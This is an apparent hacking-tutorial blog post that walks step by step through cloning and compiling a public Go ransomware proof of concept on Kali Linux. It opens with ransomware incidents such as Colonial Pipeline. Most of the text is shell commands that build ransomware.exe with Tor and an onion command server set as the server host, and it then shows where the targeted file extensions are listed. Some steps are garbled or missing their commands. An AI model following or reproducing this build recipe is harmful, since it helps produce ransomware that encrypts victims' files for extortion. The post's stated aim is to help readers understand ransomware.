Ransomware is fast becoming the most important form of malware affecting our digital systems. Companies around the world are being hit by various forms of malware, including a new variant, Snake, designed specifically for SCADA/ICS systems.
Colonial Pipeline in the US was shut down for nearly a week before paying a $5 million ransom, demonstrating the risk this ransomware poses to a nation's industrial systems and infrastructure. Recently, the major American insurance company CNA admitted to paying a ransom of 40 million dollars! No wonder ransomware developers are getting more creative and malicious, ransomware pays!
To better understand how ransomware works, let's build our own ransomware from a Proof of Concept (POC) available from mauri870 on github.com. He developed this ransomware as part of his academic program and it is not designed for malicious purposes, but rather to help us understand how ransomware works. Like the new variant, Snake, and a growing number of malware strains, the malware is written in Golang.
The malware encrypts files in the background with AES-256-CTR and uses RSA-4096 to secure data exchange with the server. This ransomware is very similar to Cryptolocker, one of the most successful ransomware attacks in history.
Step #1: Download and install them Binaries
The first step is to run Kali and make sure golang is installed. If not, download it from the Kali repositories by entering,
kali > sudo apt install golang
Then you will need to login as root user.
kali > sudo su -
Now create a directory for the binaries. In this case, I simply named it “git”.
kali >mkdir git
Then change directory (cd) to that directory.
kali > cd git
Then download the binaries from github.com.
kali > git clones https://github.com/mauri870/ransomware
Step #2: Extract GO variables
Next, we need to set some variables to point the binaries and GO to the appropriate directories.
Step #3: Build the source code dependencies
Now, with the variables set and exported, we need to create the dependencies. Navigate to the new directory, ransomware, and type make deps.
kali > cd ransomware
kali > make deps
Step #4: Build the source code with options
Now that we have completed it deps make, we can start building the source code. In our case, we will use a few options.
First, we want to use ToR to encrypt our communications over the ToR network.
USE_TOR=true
Second, we want to use our server at hackersarisegtdj.onion (you can use any domain or localhost).
SERVER_HOST=hackersarisegtdj.onion
Third, we want to use the port 80 (you can use any port).
SERVER_PORT=80
Finally, we want to set the operating system for the compiles of the source code for our operating system, in this case Linux.
GOOS=linux
Our command should look something like this,
kali > make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linux
Now press ENTER to create your ransomware.
Step #5: Check the directory for ransomware.exe
Once the source code is generated, make a list in the ransomware directory.
kali > ls -l
Now, navigate to the bin directory.
kali > cd bin
Here, you will see ransomware.exe, server and unlocker.exe.
Step #6: Consider the types of files to encrypt
If you want to see what types of files this ransomware will encrypt, go to the cmd directory and open it common.go
kali > cd cmd
kali > more common.go
Here, you can see the file extensions that this ransomware aims to encrypt when executed.
Summary
Ransomware is perhaps the biggest threat to our digital systems right now. As the Colonial Pipeline attack clearly demonstrated, almost everyone is vulnerable and if SCADA/ICS systems are compromised there can be significant financial and infrastructure impacts!
This ransomware POC will help you better understand ransomware as a threat and check if your systems are vulnerable to such an attack.
In the second part of this series, we will test the ransomware on a Windows VM.
